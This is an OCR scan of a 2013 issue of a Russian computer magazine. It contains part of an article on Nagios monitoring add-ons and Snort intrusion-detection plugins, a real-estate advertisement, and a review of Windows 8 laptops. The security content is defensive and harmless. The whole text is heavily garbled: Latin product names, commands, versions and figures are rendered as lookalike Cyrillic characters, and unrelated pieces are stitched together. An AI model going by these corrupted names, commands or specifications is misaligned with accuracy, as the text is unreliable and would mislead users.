основные возможности личество клиентов. Поставляется Спеск_МК с набором готовых 
этого решения. правил проверки, веб-интерфейсом (можно использовать вме- 


сто штатного Мад!о$ или вместе с ним) и модулем для быстрого 
доступа кядру Мад!о$. Поддерживается автоматическая конфи- 
гурация проверок узлов. Для разных ОС разработаны агенты, 
возможен и «безагентный» мониторинг на основе ЗММР Проект 
предлагает пакеты для установки в разных системах и дистри- 


Ре БОШ Уре Зеагой Тептигат Нр 


изег@изег -маси1пе - $ свеск мк арепе 


Папа =. # 


=<<«сНеск_шк>>> 

Мег510п: 1.1.12 

Ареп{05: 11пих 

Р]ирап5О1гесфогу: /и5г/116/сНеск_мК_акепе/р1и81п5 
оса101гессогу: /ыу5г/116/сВеск_тК_азепе/]оса] 
Арепе01гестогу: /етс/спеск тк 


«че» 
/Чем/5Ча1 ех14 124602456 6185204 112178276 6% / 
идем ЧемттрР 5 787184 =. ТВ 7180 1% /дем 


«ей тои 52: > 
«тои 


дем га 15К/Бу-ци19/36За0Т6а-с819-428е-9Та/-свО2ебовУ61е / ехтА ги, ге1аттте, еггогзагетоиги -го 


‚у5ег хастг,багг1ег=1 , датагогдегед 0 0 
крах 

(гоот, 24432,2148,0.0) УЗЬтпуи1итЕ 
(гоот,0,0,0.0) [КтИгеа99] 
(гоот,0,0,0.0) [К5оте1г99/0] 
(гоот,0,0,0.0) [КмогКегги:0] 
(гоот,0,0,0.0) [м1ргае10п/0] 
(гоот,0,0,0.0} [матейд9я/о] 
(гаот,0,0,0.0) [м1 гае10п/1] 
(гаот,0,0,0.0) [К5оте1г49/1] 
(гооЁ,0,0,0.0) [маЕсЬ9оя/1] 
(гооф,0,0,0.0) [сру5зеЕ] 
(гооЁ,0,0,0.0) [КРе1рег] 
(гооЁ,0,0,0.0) [КдеуетрР 5] 
(гоое,0,0,0.0) [пефп5] 
(гоот,0,0,0.0) [КиогКег/и:1] 
(гооЁ,0,0,0.0) [5упс_зирег$] 
(гоот,0,0,0.0) [691-детау1т] 


Просмотр данных, собранных агентом Спеск МК 


Сетгеоп — один из лучших интерфейсов к Мад!о$ 


бутивах. В УБищи он уже доступен в репозитории, все компо- 
ненты можно найти командой «ар{-саспе $еагсй спеск-ткК». 

Очень полезная коллекция из более чем 50 плагинов (раз- 
биты на 17 категорий) предложена проектом МопНопптда Ридт$ 
(БИ.у/хыезЗ). Установив ее из исходников, получим возмож- 
ность проверять статус Бопатда-интерфейсов, состояние памя- 
ти и тетсаспеа, задания СУР$, работу Араспе, 0М$, МуЗОЕ, 
ПОМ, политики ЗЕМпих, 55Ё-сертификаты и многое другое. 
Набор содержит настройки для отправки уведомлений по $М$, 
пла! и в Зощ (для отладки). 

С распространением мобильных устройств нередко возника- 
ет задача их отслеживать. Для этой цели в дополнениях к Мад!0$ 
можно найти нужные плагины, и выбор здесь большой — аМад, 
иМаог, Мад. Самый популярный, наверное, аМад (Би.1у/ЛаЕУТи5)}, 
позволяющий проверять состояние Апагоа-устройств, поддер- 
живает подключение к нескольким серверам Мад!о$ или спада. 
Реализовано автоматическое обновление состояния, фильтра- 
ция сообщений, различные уведомления и многое другое. 

Некоторые полезные дополнения не представлены в ука- 
занных репозиториях. Например, Регсопа также предлагает 
набор из 12 плагинов для расширенного мониторинга МуЗОЕ 
и клонов, сделанных к тому же весьма профессионально. С их 
помощью можно проверять задержки репликации, привилегии, 
отслеживать взаимоблокировки (ЧеаЧюоск$), процессы МУЗОЕ 
(достижение критического уровня), контрольные суммы та- 
блиц, заполненность (\ММ-тома и многое другое. Плагины будут 
работать в любой *тх-системе, для более простой установки 
в дистрибутивах Мпих разработчики предлагают репозиторий. 


ПЛАГИНЫ ДЛЯ САСТ 


В Сасй реализована поддержка плагинов при помощи 
РА (Рудт АгспКесиге). Список основных плагинов 
приведен на страничке дос$.саси.пе/ршат$. Один 
из самых интересных — \/а{Пегтар — позволяет ото- 
бразить территориальное расположение филиалов 

с используемым оборудованием. 


Также не лишним будет упомянуть различные инструмен- 
ты, которые восполняют недостающие в штатном интерфейсе 
функции. Например, аддон Мад\/Л$ (пад\$.ога) визуализи- 
рует состояние узлов и сервисов, предоставляя наглядную 
карту (ее внешний вид мы можем выбирать самостоятельно), 
и при помощи гаджетов выводит различные диаграммы. Все 
установки производятся через веб-интерфейс, параметры 
устройств берутся из Мадю$/МуЗ ОЕ. Для удобства графики 
Мад\/5 можно интегрировать в интерфейс Мадо$. В Мад\/$ 
Ехспапае (ехспапде.пад\$.ога) доступны дополнительные 
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‘Таеетиин 
РИ БОШ Умых Зоагей Топтел Нар 
узегдизег-тасИ1пе - $ эпогЕ --дад-115% 
Аиа112а61е ОАО моди1е5: 
рсар(\3): геадБаск 11уе ти1т1 ипрг1у 
1рРм(и2): 11уе 111 1пе ми цпрг1\ 
Читр(\у1): геадБаск 11уе 1п11пе пи11 ипрг1у 
аТрасКкет (4): 11ме 1п11пе ти1Е1 ипрг1 м 
изегдиузег-тасН1пе - $ 


Просмотр списка доступных ВАО -модулей 


шаблоны, карты, значки и прочие элементы, расширяющие 
его возможности. 

Среди множества веб-интерфейсов к Мадо$ особо выде- 
ляется Сещгеоп (септгеоп.сот) — удобный, красивый, функ- 
циональный. Предусмотрена отправка уведомлений на почту 
или 5М$. Все настройки производятся непосредственно че- 
рез веб. Служебные данные Септеоп хранит в МуЗСЕ, данные 
мониторинга — в ВНО. 

По умолчанию Мад!юо$ заносит информацию в файлы, спе- 
циальный модуль МОО2И11$ позволяет экспортировать собран- 
ные ранее и новые данные в МУЗСЕ, откуда их уже могут брать 
сторонние приложения, вроде Мад\!5 и Сетгеоп. 

Создание конфигурационных файлов можно поручить МСоп? 
(псопт.$тпеЕ{) или Мадю$О( (падю$91.ога), которые позволяют 
сделать все необходимое через веб-интерфейс. Например, 
Мадю$ ОЕ ориентирован на предприятия любого размера, со- 
вместим с Мадо$ 2.х/З.х и клонами, поддерживает несколько 
наборов конфигураций, мощные функции импорта, возможно 
применение сценариев, шаблонов и переменных, информация 
сохраняется в МУЗО(. 

Как вариант, утилита ЗсапТоМад (уаппеиздеп.сот/Дауа/ 
ЗсапТоМаа), сканируя после запуска сеть в поисках хостов 
и сервисов, автоматически создает необходимые настройки. 


$ ]ама -Заг $сапТоМай.3Заг --гапяе 192.168.1.0/24 ‹: 
- -ет1{-Еетр1афез --Е1теои{ 50 --сопфас®$ «= 
ип1х-аат1п$ --10${$-Я1е Ио$%$.сойф <= 
- -зег\у1сез-А]е зег\1се$. соп+ 


СИСТЕМА ОБНАРУЖЕНИЯ АТАК ЗМОВТ 

Наиболее популярна из ореп зоигсе сетевых систем обнару- 
жения атак Зпой, способная производить в реальном времени 
анализ и блокировку подозрительных !Р-пакетов. Зпой обнару- 
живает атаки, комбинируя два метода: сигнатурный и анализ 
протоколов. За время развития проекта к ней было разрабо- 
тано множество дополнений, патчей, модулей и интерфейсов, 
расширяющих базовые возможности. Большая часть из пред- 
ложенных патчей постепенно перекочевала в основную ветку 
и развивается под эгидой Зоигсейге. 

Зпой стартовала в 2000 году исключительно как 10$, не пре- 
доставляя механизмов блокировки пакетов. Поэтому, навер- 
ное, самый популярный среди плагинов — ЗпоиЗат (зпозат. 
пе!), позволяющий блокировать 1Р-адрес злоумышленника пу- 
тем перенастройки правил пакетного фильтра. Поддерживают- 
ся |Р Ейег (рР), р№м2, Раске Е\ег (рЕ), Мпих 1Р4аез/Емаые$, 
некоторые роутеры С!5со и Чипрег и так далее. Одна установка 
может перестраивать правила сразу нескольких файрволов. 
Поддерживается белый список, установка времени блокиров- 
ки, гибкие правила, обнаружение ОБо$ и многое другое. Сам 
5поц5ат состоит из двух компонентов: патча к Зпой и управля- 
ющей программы. Для защиты соединения между Зпоп и аген- 
том эпой5ат используется шифрование Тмо ЕП. 

Альтернативой Зпо(иФат можно считать скрипт Амзпой 


(српегдупе.ога/м/зпо!), преобразующий правила Зпоп в эк- 


вивалентные для 1ртафе$ (через '--Пех-з{ито’). Кроме этого, 
реализован патч для собственно Зпо — зпой_ тш!пе, позволяю- 
щий активировать функциональность 1Р$. Но в настоящее вре- 
мя проект, по сути, закрыт (последнее обновление датировано 
2010 годом, для версии Зпоп 2.8.2), разработчики зпой_т!те 
переключились на ШО$ЛР$ Зипкаа (зипйса{а-19$.ога). В целях 
совместимости функционал зпой_т!пе реализован с помощью 
механизма РАО в виде модуля ПРО (см. врезку). Традиционно 
для обновления правил используется Отктазег, но он не об- 
рабатывает динамические правила (ЗВагеа Обес{ Рие$, $0_ 
гие5), а потому подключать их приходится самостоятельно. 


Способные подмастерья 


МЛ 


Руководство Сшае {о 
МузОЕ апд №501: 


Б.у Зо ем 


Файлы Нап4ег5оскет: 
БИ. 1у/15НУРх5 


Каталоги плагинов 
и аддонов к М№ад103$: 
падо$ри0!1$.0га, 
ехспапде.пад!0$.0г(, 
топНогипаехспапде.ога 


Сайт 5поЦ$ат: 
по зат. пе 


737 


# эпогЕ -с /ефс/5поге/ пог. сой+ += 
- -дчитр-Аупат1с-ги1е5=/ефс/ пог /зо_ги1е$ 
Е1п15пе ачтр1п Чаупат1с ги1е$. 


Процесс обновления правил также можно полностью ав- 
томатизировать при помощи Рей-скрипта РийеаРогКк (соде. 
дооче.сот/р/риНеарогк). 

Система, построенная на Зпо\щ, способна собирать и об- 
рабатывать информацию с нескольких датчиков. Проблема 
может возникнуть, когда при превышении порога Зпом бу- 
дет вынужден остановить анализ трафика, пока собранные 
данные не будут сохранены в файл или БД. Эту проблему 
решают при помощи плагинов, разделяющих функции ана- 
лиза и сохранения. Наиболее известен Вагпуага (уже пре- 
кратил свое развитие, Багпуага.$Т.пе{) и его форк Ватуага2 
(аипуб.сот/Ягпзу/багпуага2), получающие на вход «унифи- 
цированный» формат (ипШеа2) и сохраняющие данные в ука- 
занном виде (поддерживается аитр, С$\, $у$1ю9, отправка 
в АСЮ и $9и1). Примерно по такому же принципу работает 
ЕЁоР (Раз одата Рго]ес{ ог Зпом, аезспке-оп!те.ае/ЕЁорР) 
и тиарк (тиарн.$1.пет). ГГоР специально разработан и опти- 
мизирован для распределенной инфраструктуры, собирает 
информацию на удаленных датчиках и отправляет ее на цен- 
трализованный сервер для анализа (поддерживается Музо(Е 
и Розогезо |). В отличие от Вагтуага2, в котором для каж- 
дого ЗЕЕЕСТЛМЗЕАТ используется ТСРЛР, что при большой 
нагрузке вызывает задержки, в ЕГоР эту функцию выполняет 
сокет УМХ. При достижении определенного порога опасно- 
сти на етай админа будет отправлено предупреждение. 


НОВЫЙ МЕХАНИЗМ ЗАХВАТА 
ПАКЕТОВ В $МОВТ 2.9 


В 5пом 2.9 вместо прямого обращения к рсар использован механизм РАО 
(ата Асац$Нюп Ибгагу), впервые анонсированный в 2010 году и добавляющий 
новый уровень абстракции. Он позволяет проще реализовать захват на разных 
платформах, без внесения изменений в исходный код, в итоге отпала необходи- 
мость в некоторых патчах. Сам РАО предоставляет несколько модулей, имеющих 
свои функции: РСАР (захват), АРРАСКЕТ (!Р$, блокировка трафика между двумя 
интерфейсами в Ипих), МЕО (использования СУЕЧЕ для передачи пакета в 
изегзрасе для анализа, Мпих), РАМ (то же, что и МЕС, только работает в ЕгееВ $0 
и ОрепВ $0), РО (5пой_ ш!те) и ВУМР. Модули могут быть собраны как статиче- 
ски, так и динамически (--41з5а е-зайс-адаа). Для просмотра списка доступных 
модулей вводим команду: 


# эпогЕ --Чаа-11$* 


По умолчанию для захвата используется модуль РСАР которому можно передать 
специфические параметры: 


# эпогЕ --даа рсар --Чаа-то4е ра$$1\уе -1 ефио 


Но при необходимости модуль по умолчанию можно изменить на этапе сборки: 


# ./сопйвиге "СРРЕГАб5=-ОБЕРАЦЕТ _ОАО=<фуре>" 


Разработчики Зпой занимаются только движком, остав- 
ляя анализ данных третьим сторонам. В результате появи- 
лось очень много скриптов и СУ|, позволяющих визуально 
оценить информацию — ВАЗЕ, $пет, ОЗЗМ, $адийЙ, Зпогбу 
и другие. 


ЗАКЛЮЧЕНИЕ 

Современные проекты предлагают простую возможность 
для расширения, поэтому не всегда, чтобы решить какую-то 
проблему, следует бросаться в лоб и писать недостающий 
функционал. Как правило, все необходимое уже есть, нужно 


== 


только постараться это найти. —— 
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ЖИЛОЙ КОМПЛЕКС 
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ПО ВОПРОСАМ ПРИОБРЕТЕНИЯ КВАРТИР 
(«МОНОЛИТ НЕДВИЖИМОСТЬ) 


^\ 


141006, Московская область, 
г. Мытищи, Олимпийский проспект, д. 48 


Тел.: (495) 660 96 31, (495) 662 74 50, 
факс: (495) 660 96 41 


Группа компаний «Монолит» приглашает к зна- 
комству с новыми жилыми домами в комплек- 
се «Мещерихинские дворики» на улице Моло- 
дежной уютного подмосковного города Лобня. 


До места встречи можно добраться от м. Алтуфьев- 
ская автобусом №459 или с Савеловского вокзала на 
пригородной электричке до ст. Лобня далее 7-10 мин. 
автобусом №1. Ближайшие транспортные магистра- 
ли — Дмитровское, Ленинградское шоссе. 


В жилом комплексе «Мещерихинские дворики» 

вас ждут два прекрасных 17-этажных двухподъезд- 
ных дома под номерами 14а и 14Б. Это - надежные 
монолитно-кирпичные здания, оснащенные всем 
необходимым для жизни, в том числе грузовым 

и пассажирским лифтами. 


Здесь вы сможете выбрать для себя светлые и про- 
сторные квартиры современной планировки - одно, 
двух и трехкомнатные. В квартирах предусмотрены 
пластиковые стеклопакеты, радиаторы с терморегуля- 
торами, электроразводка, застекленные лоджии и т.д. 


Для любителей прогулок организована зона отдых, 
украшенная декоративными кустарниками и деревья- 
ми, благоустроенная игровая площадка для детей, 

а для автомобилистов -— стоянка. Молодых родителей 
порадует новый детский сад в шаговой доступности. 


Группа компаний «Монолит» надеется, что после пер- 
вой же встречи с новой квартирой, у Вас возникнет с 
ней взаимная симпатия и долгие надежные отношения. 


Условия приобретения квартир: рассрочка пла- 
тежа, ипотека, взаимозачет Вашей старой квартиры 
на Вашу новую. Возможны скидки при условии 100% 
оплаты и использовании ипотечного кредита. 


(495) 739-93-93, 967-65-57 


Г. МОСКВА, УЛ. БАУМАНСКАЯ, ДОМ 33/2, СТР. 1 


ГРУППА КОМПАНИЙ «МОНОЛИТ» - ОДНО ИЗ КРУПНЕЙШИХ ПРЕДПРИЯТИЙ-ЛИДЕРОВ 
МОСКОВСКОЙ ОБЛАСТИ, ДЕЙСТВУЮЩИХ НА СТРОИТЕЛЬНОМ РЫНКЕ С 1989 ГОДА. 
ОСНОВНЫМ НАПРАВЛЕНИЕМ ДЕЯТЕЛЬНОСТИ ГРУППЫ КОМПАНИЙ «МОНОЛИТ» ЯВЛЯЕТСЯ 
ВОЗВЕДЕНИЕ ЖИЛЫХ ЗДАНИЙ И ОБЪЕКТОВ СОЦИАЛЬНОГО НАЗНАЧЕНИЯ ПО ИНДИВИ- 
ДУАЛЬНЫМ ПРОЕКТАМ. В ОСНОВЕ ЛЕЖИТ ТЕХНОЛОГИЯ МОНОЛИТНОГО ДОМОСТРОЕНИЯ. 


С подробными схемами планировок квартир 

и проектной декларацией можно ознакомиться 
на сайте м/мими.дК-топоШ.ги или в офисе 
компании «Монолит недвижимость» 


Группа «Монолит» активно работает с ведущими Город Лобня расположен в лесопарковой зоне 
банками по программам ипотечного кредито- Подмосковья, в ближайшем окружении имеются 
вания. Особое внимание уделяется правовой живописные озера и пруды. Недалеко от Лобни - 
защищенности клиентов, приобретателей ансамбль бывшей усадьбы Марфино, несколько 
жилья и нежилых помещений. центров русских народных промылов. Культурная 


жизнь города сосредоточена в основном в Куль- 
турно-досуговом центре «Чайка» и парке Культуры 
и Отдыха, есть театры и музеи, художественная 
галлерея. Для любителей спорта - два бассейна, 
ледовый каток, Дворец спорта «Лобня». 
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л\\ ПО ВОПРОСАМ АРЕНДЫ ПОМЕЩЕНИЙ (985) 727-57-62 


(ООО «МОНОЛИТ АРЕНДА),) 


РЕДАКЦИЯ ВЫРА- 
ЖАЕТ БЛАГОДАР- 
НОСТЬ КОМПАНИЯМ 
АЗУЗТЕК СОМРУОТЕН 
МС, БЕЕЕЗЫЕ В 
М$1, ЗАМ$УМС, ОМУ 
ТОЗНИВА ЗА ПРЕДО- 
СТАВЛЕННОЕ ДЛЯ 
ТЕСТИРОВАНИЯ ОБО- 
РУДОВАНИЕ 


РАБОЧИ 
ЛОШАДКИ 


СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ 
НОУТБУКОВ СРЕДНЕИ ЦЕНОВОИ 
КАТЕГОРИИ НА БАЗЕ МЛМООМЪ 8 


Повальное внедрение планшетов заставило рынок ноут- 
буков проснуться, дабы сделать качественный скачок, — 
этот год определенно можно считать годом лэптопов 

с сенсорными экранами. Они были доступны и ранее, 

но новые процессоры, новая ОС М/пао\м$ 8 и повышен- 
ное внимание ктеме наконец экономически (и логиче- 
ски) оправдали сенсорные ноутбуки. Результат — 
россыпь устройств, часть из которых мы столкнули лба- 
ми в тесте. 


СПИСОКТЕСТИРУЕМОГО 
ОБОРУДОВАНИЯ 


. А51$ $300СА 

. Ое! шзриоп 5523 

. НРЕММУ 4-1161ег 
Алексей - батзипд 4708 4Е 

Шуваев о Зопу МАО $\Т131271А$ 

. Тозпба зае!Не 19500-08В$ 


У 


МЕТОДИКАТЕСТИРОВАНИЯ 

Так как тестовые компьютеры во многом должны бу- 
дут выполнять мультимедийные задачи, то и методи- 
ка тестирования будет опираться на мультимедийные 
тесты. К примеру, мы воспользовались бенчмарками 
РСМагк 7 и ЗОМакк Уащаде. Для измерения темпера- 
туры процессора, жесткого диска, чипа видеоадаптера 
и центрального процессора мы воспользовались ути- 
литами АШФШАбА, Риг/Магк и Шпх. Для оценки произво- 
дительности при работе в интернете мы использовали 
браузерные бенчмарки Е$ЗМЕ Тапк (на 1000 объектов), 
Назй Вепспта!к '08, РеасеКеерег и Сапуа$ Ре!огтапсе 
{е5{ — разрешение 1920 х 1080 точек. Для проверки про- 
изводительности процессора запускался бенчмарк ко- 
дирования видео х264 НО Вепсптагк 4.0 в два прохода. 
Для проверки игровых возможностей компьютеров мы 
использовали бенчмарк на базе игры Знее{ Нащег М. 


ХАКЕР 07 /174/ 2013 Рабочие лошадки 


А$И5 \МУОВООК $300СА 


сенсорный экран 

длительное время авто- 
Это один из самых тонких лэптопов в те- 
сте, который показал очень неплохие 
результаты. Благодаря клинообразной 
© форме корпуса, сужающегося с «кор- 
мы», АЗУ$ МмоВоок $5300СА отчасти на- 
поминает небезызвестный яблочный но- 
утбук. Нельзя не отметить крайне тонкий 
корпус и отличное качество сборки всех 
элементов: никакого скрипа, перегибов 
или продавливания пластика — все лег- 
ко, просто и надежно. Если потребуется 
подключить проектор или внешний монитор, то можно воспользоваться 
портами О-Зи6 или НОМ!. Любители сетевого общения могут остаться не- 
довольны, так как на боку расположен всего один разъем для подключения 
наушников или гарнитуры — включить сразу наушники и микрофон не полу- 
чится, поэтому придется пользоваться встроенными колонками или микро- 
фоном для общения. 

Несмотря на процессор семейства Соге 13, он неплохо справлялся с по- 
ставленными задачами. Но стоит отметить, что существуют модели с про- 
цессорами вплоть до Соге 17. Тем приятнее было увидеть в результатах 
теста автономной работы напротив УмоВоок $300СА самый лучший ре- 
зультат — более двух с половиной часов от одного заряда батареи. Если по- 
смотреть на начинку, то модель вполне отражает свои возможности: дли- 
тельное время работы, производительность, достаточная для большинства 
пользователей, небольшие габариты и сенсорный дисплей. 

Управление жестами однозначно приятнее касаний 
но для опрятности стоит запастись платочком из микрофибры. 

Что примечательно, модные облачные технологии затронули и этот но- 
утбук. Каждый владелец девайса вправе рассчитывать на 32 Гб простран- 
ства в фирменном облаке АЗУ$ \\МебЗтогаде. Бесплатный доступ возмо- 
жен с любого устройства в течение трех лет, а далее за сервис придется 
платить. 


номной работы 
хороший дизайн и сборка 


для увеличения произво- 
дительности неплохо бы 
установить $$0 
всего один 3,5-мм]аск 


тачпада, 


7.35 


ОЕШЕ 1МЗРИВОМ 157 5523 


сенсорный дисплей 
встроенный оптиче- 
Именитый американский производи- 
тель не остался в стороне и представил 
на наш с тобой суд реально компактный 
ультрабук. При этом отметим нали- 
© чие оптического привода. Расположен 
он справа, а кнопка открытия смон- 
тирована так близко к нижнему краю, 
что иной раз придется приподнимать 
ноутбук для ее нажатия. 

Компактный ноут имеет разрешение 
720р, что несколько ниже, чем у всех конкурентов, при этом картинка оста- 
ется четкой и приятной. 

В нашем образце был установлен производительный процессор Соге 15- 
ЗЗ1ТО, 6 Гб оперативки с возможностью расширения до 16 Гб при установ- 
ке двух модулей и жесткий диск на 500 Гб. Приятно, что установлен модуль 
$$0, который заметно ускоряет работу в режиме кеширования. Количество 
интерфейсов невелико, отчасти оттого, что место занимает оптический при- 
вод, отчасти потому, что ультрабук — это все же не мультимедийная станция. 
Но надо отметить, что этот лэптоп, в отличие от конкурентов, наделен дис- 
кретным видеоадаптером, пусть и не самым современным, но позволяющим 
поиграть во многие игры. Это становится заметно во время игровых тестов: 
система вентиляции работает безостановочно, но при этом не слишком 
шумно. Теплый воздух выдувается с левого торца устройства, через неболь- 
шое по площади вентиляционное окно. 

беИипзриоп 157 5523 оснащен неплохой акустикой, которая создаст под- 
ходящую атмосферу при просмотре кино. Как и предыдущая модель, этот 
ноутбук оборудован только одним аудиоразъемом, поэтому для общения 
надо будет воспользоваться встроенным микрофоном или динамиками. 
Тачпад с раздельными кнопками удобен для управления, а при его отклю- 
чении загорается специальный светодиод. Примечательно, что существуют 
модификации с подсвечиваемой клавиатурой. Но у нас, в отличие от Запа- 
да, продают готовые комплектации без возможности выбора опций. 


ский привод 
дискретный видео- 
адаптер 


маленькое разрешение 
дисплея 


136 


НР ЕММУ 
4-1161ЕВ 


сенсорный дисплей 

хорошая акустика 
быстрая работа 

подсветка кнопок 

НР уже очень давно на рынке ноутбуков. 

© И потому точно знает, что нужно предло- 

жить покупателю. Компактный четырнад- 

цатидюймовый ультрабук с сенсорным 

экраном — золотая середина и отличная 

диагональ для сенсорного экрана. 

Начнем с того, что ультрабук оснащен 
сенсорным экраном и работать с ним до- 
вольно просто. Но еще привлекает внимание большой бескнопочный тачпад. 
Двойным тапом по специальной области можно его отключить. К слову, тач- 
пад не всегда срабатывал на прикосновения пальцев, а иногда при ведении 
курсора переставал чувствовать нажатие. Шустрый процессор с низким 
энергопотреблением, много памяти, эталонная «смесь» из традиционного 
жесткого диска и твердотельного накопителя — быстро, надежно и доста- 
точно емко. Такой мобильный компьютер рассчитан на длительную ком- 
фортную работу, серфинг в Сети или просмотр фильмов, поэтому в него 
не стали встраивать дискретный видеоадаптер, а встроенного видеоядра 
вполне хватит для всех перечисленных задач. 

Помимо указанных возможностей, ультрабук оснащен специальной 
акустикой от Веа{5 Аиаю, которая включает пару динамиков и сабвуфер. 
Сложно назвать это серьезной акустикой, но по сравнению с конкурентами 
звук действительно приятно удивляет при просмотре фильмов — а от баса 
даже чувствуется небольшая вибрация, если держать руки на столешнице 
во время сцен с низкочастотными ударами. 

Дело в том, что колонки выведены на верхнюю панель, а динамик на- 
правлен вниз — в стол, что должно неплохо сыграть, если стол будет дере- 
вянным и начнет немного резонировать, но не дребезжать. Работать можно 
одинаково комфортно как при свете дня, так и в полной темноте, ведь кла- 
виатура этого ультрабука наделена подсветкой. Что ж, впечатления от уль- 
трабука достаточно приятные, лишь немного расстроил тачпад, который 
отзывался на касания пальцев довольно своеобразно. 


тачпад невсегда сраба- 
тываетна нажатия 
сильный нагрев 
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ЗАМЗИМС 
4ТОВАЕ 


длительное время 
автономной работы 
малый вес 
6 ГбОЗУ 

С компактными ноутбуками, как с авто- 

© мобилями, наблюдается некоторая за- 

кономерность: при определенном типе 

«кузова», как ни старайся, дизайн будет 

одинаков. Различия заключаются лишь 

в мелочах. Так и в компактных ноутбуках 

разброс совсем небольшой: компактная 

система охлаждения, экран до 14 дюй- 

мов, небольшая батарея, производитель- 

ный процессор со встроенной графикой. 

Тем не менее компания Затзипа выпу- 

стила довольно интересный ноутбук, пусть и не с сенсорным, но все равно 
хорошим экраном. 

О мелочах: к примеру, кнопка включения Затзипа 470А4Е выполнена 
в виде выпуклого значка Ромег — необычно, элегантно, надежно. В целом 
батзипа 470В4Е имеет лаконичный дизайн. Клавиатура островкового типа 
привычна большинству пользователей ноутбуков. Отзывчивый тачпад имеет 
пару механических кнопок. 

В систему инсталлирован не самый шустрый процессор ще! Репйит 
997. «Камень» имеет два физических ядра, Нурег-Тпгеаатоа нет. Встроенной 
оперативной памяти в нашем экземпляре было установлено 6 Гб, в топовом 
конфиге 8 Гб. Накопитель Затзипа 470РАЕ «увесистее», чем у большинства 
конкурентов, — 750 Гб. 

Тем важнее автономность ноутбука — а в этом тесте он занял второе место 
с результатом работы 2,5 часа от батареи. Приятно, что система охлаждения 
выведена на заднюю сторону, а не вбок, как это сделано у большинства мо- 
бильных компьютеров. 

В остальном Затзипа 470А4Е можно назвать самой что ни на есть рабо- 
чей лошадкой, которая будет перемещаться вместе с тобой и радовать тебя 
стабильной работой. Вес и довольно скромные габариты как раз предполага- 
ют частые путешествия такого лэптопа. 


отсутствие сенсорного 
дисплея 
для увеличения произ- 
водительности неплохо 
бы добавить $50 
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ОМУ 
$\Т1312718$ 


отличная эргономика 
сенсорный дисплей 


высокая стоимость 
мало 9$В 


С японским упорством и верностью 
традициям Зопу продолжает продви- 
гать свое видение качества и удобства. 
Ноутбуки компании Зопу отражают 
гармоничные отношения инженеров 
и дизайнеров. И это не реклама — про- 
изводитель действительно оттачивает 
каждую модель почти до совершенства. Казалось бы, прямоугольные грани 
на самом деле оказываются совсем не жесткими, а скругленными. Корпус 
из магниевого сплава оказался очень легким, но при этом достаточно проч- 
ным и при нажатии не продавливается, как пластик. Следы от пальцев нанем 
практически не остаются, а удаляются одним движением чистящей салфет- 
ки. Лэптоп при размере экрана 13,3 дюйма имеет вес немногим больше по- 
лутора килограммов, что является неплохим достижением. Встроенное же- 
лезо рассчитано на довольно серьезные нагрузки, как вычислительные, так 
и физические, — твердотельный накопитель не жалуясь перенесет прыжок 
ноутбука на кровать. Кроме того, загрузка с таким накопителем происходит 
в считаные секунды, а при выходе из режима сна можно не успеть моргнуть, 
как компьютер будет готов к работе. Большое количество интерфейсов по- 
зволит организовать в пути миниатюрный офис. Но вот странную любовь 
инженеров располагать довольно близко порты УЗВ сложно объяснить: 
при установке в один из портов УЗВ-флешки во второй можно будет вот- 
кнуть разве что кабель удлинителя. Кроме того, на борту присутствуют лишь 
два универсальных порта: второй и третьей ревизии — это как минимум 
на один порт меньше, чем у конкурентов. 

Надо отметить, что удобство пользования достигается и дополнитель- 
ными традиционными тремя кнопками, которые вызывают настройки, асси- 
стента и произвольную программу. Что касается результатов тестирования, 
то производительный процессор в большинстве бенчмарков вывел ультрабук 
в стан победителей, а отсутствие дискретного видеоадаптера не понравится 
лишь любителям игр. Впрочем, такие ноутбуки созданы не для этого. 


ТОЗНВА ЗАТЕШИТЕ 
[9500-0В$ 


производительное 
видеоядро 
оптический привод 
низкая стоимость 
Процессор с низким энергопотреблени- 
© ем и видеоядром АМО Вадеоп НО 75006 
вполне способен продемонстрировать 
игровую графику при достаточно дли- 
тельном времени автономной работы. 
Удивительно, что при всей технологично- 
сти начинки экран не сенсорный. 

Производитель сумел разместить 
в компактном эргономичном корпусе О\О-привод. Правда, вырос немно- 
го вес самого устройства, но это не критично. Кроме того, среди сетевых 
адаптеров мы обнаружили Вищоо ревизии 4.0, что довольно интересно, 
так как скорость передачи по этому стандарту может достигать 1 Мбит/с, 
но не это главное, а возможность поддерживать соединение на расстоянии 
до 100 метров и улучшенный режим энергосбережения. 

Клавиатура островкового типа имеет стандартные размеры, но благо- 
даря расположению близко к краю корпуса удалось разместить еще и циф- 
ровой блок клавиш справа. Кнопки со стрелками получились маленькими, 
и к этому придется привыкнуть. Кроме клавиатуры и кнопки включения, 
на лицевой панели больше нет никаких клавиш — дополнительные функ- 
ции подвешены на функциональный ряд с использованием клавиши <ЁЕп>. 
Тачпад смещен влево относительно центра, что будет удобно левшам, 
но не правшам. Еще лучше пользоваться мышью с поддержкой Виос1й — 
не придется устанавливать дополнительный адаптер и занимать драгоцен- 
ный порт ЦЗВ. На боковой панели нашлось место сразу для разъемов под- 
ключения микрофона и наушников, поэтому сетевые баталии с голосовыми 
чатами пройдут с полным комфортом. 

По результатам проведенных тестов заметно, насколько процессоры 
от АМРО уступают процессорам |ще|, но разве это помешает истинным фа- 
натам компании и любителям технологичных штучек, тем более когда цена 
на устройство так приятно радует глаз и позволяет получить игровой ультра- 
бук менее чем за 20 тысяч рублей? 


отсутствует сенсорный 
экран 
слабый процессор 
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ХАРАКТЕРИСТИКИ 


ОС: 

Экран: 
Процессор: 
ОЗУ: 
Накопители: 


Видеоадаптер: 
Интерфейсы: 


Дополнительно: 


Габариты: 
Вес: 


ОС: 

Экран: 
Процессор: 
ОЗУ: 
Накопители: 


Видеоадаптер: 
Интерфейсы: 


Дополнительно: 


Габариты: 
Вес: 


Ееггит 


ТЕХНИЧЕСКИЕ 


АЗИ$ МиоВоок $ЗО0ОСА 


МИптдом$ 8 Рготезюпа! хб4 
13,3", 1366 х 768 

пе! Соге 13-32170, 1,8 ГГц 

4 Гб 

500 Гб НОО, $АТА (5400 об/мин) 


е! НО 4000 

1 х НОМ, 1 х аицаю ош, 1 х 0$В 3.0, 2х 0ЗВ 2.0, 
1х В.-45, 1 х кардридер 

сенсорный дисплей 


339 х 239 х 21 мм 
1,8 кг 


Затзипа 470В4Е 


МИпдомз 8 Рготезюпа! хб4 
14", 1366 х 768 

|п1е! Репнит 997, 1,6 ГГц 

6 Гб 

750 Гб НОО $АТА 


|1е! НО 4000 
1 х НОМ, 1х0-$ч6, 1 х аиаю ош, 2х ЗВ 2.0, 1х ЗВ 
3.0, 1х В/-45, 1 х кардридер 


